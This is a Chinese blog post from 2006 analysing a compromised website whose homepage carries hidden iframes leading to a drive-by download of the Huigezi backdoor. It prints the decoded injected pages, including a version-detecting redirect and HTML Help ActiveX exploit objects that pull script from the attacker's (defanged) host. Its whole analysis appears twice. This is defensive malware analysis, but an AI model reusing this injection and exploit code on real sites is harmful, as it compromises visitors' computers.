[2006-04-12]发现一个使用技术升级、下载灰鸽子的网站(第3版)
2006-04-07 23:19
686 查看
endurer 原创
2006-04-12 第3版 补充:瑞星的反应
2006-04-08 第2版 分析young.gif,确认young.css为灰鸽子
2006-04-07 第1版
网站首页被插入恶意代码:
<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>
hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,unescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,unescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉多余的起始空格):
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
此网页检查Windows版本,并打开相应的网页windows.htm、winnt.htm或w98.htm。
这与又一个自动下载病毒的政府网站中遇到的相似。
hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT><OBJECT id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news571.Click();f1=1+1;f1=f1+2;setTimeout("news577.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/w98.htm的大小为0。
hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的PE可执行文件。
hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
windows.htm 瑞星报为:Trojan.DL.JS.Agent.g
winnt.htm 瑞星报为:Trojan.DL.JS.Agent.h
2006-04-12 第3版 补充:瑞星的反应
2006-04-08 第2版 分析young.gif,确认young.css为灰鸽子
2006-04-07 第1版
网站首页被插入恶意代码:
<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>
hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,unescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,unescape()后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉多余的起始空格):
<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
此网页检查Windows版本,并打开相应的网页windows.htm、winnt.htm或w98.htm。
这与又一个自动下载病毒的政府网站中遇到的相似。
hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT><OBJECT id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news571.Click();f1=1+1;f1=f1+2;setTimeout("news577.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
hxxp://www.***hyap98.com/rx/w98.htm的大小为0。
hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的PE可执行文件。
hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
windows.htm 瑞星报为:Trojan.DL.JS.Agent.g
winnt.htm 瑞星报为:Trojan.DL.JS.Agent.h
相关文章推荐
- 推荐一个使用Ajax技术很棒的网站
- 查看一个网站使用的开发技术
- 一个被加入自动下载灰鸽子的代码的网站
- [07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
- 又发现一个技术性质的podcast网站
- 发现一个下载.Text Skin 的好网站.
- 发现一个神奇的网站,微软全系产品下载
- 发现了一个非常好的介绍Codeblocks使用的网站
- 发现一个开发技术文章不错的网站,极速CMS网www.qscms.cn
- 新发现一个很好的资料和电子书下载网站
- 如何使用epoll? 一个C语言的简单例子 - asdfjkl210 - ITeye技术网站
- 查看一个网站使用的开发技术
- oschina.net 是目前中国最大的开源技术社区。我们传播开源的理念,推广开源项目,为 IT 开发者提供了一个发现、使用、并交流开源技
- 使用Ajax技术编写了一个网站
- 发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
- 发现一个很好的电影网站,可以免费下载电影
- [2006-03-22]又发现一个带毒网站(第3版)
- 发现一个很全面的网络基础技术学习网站
- 发现一个很棒的网站,技术 + 音乐 + 其他一切
- 又一个自动下载病毒的政府网站(第3版)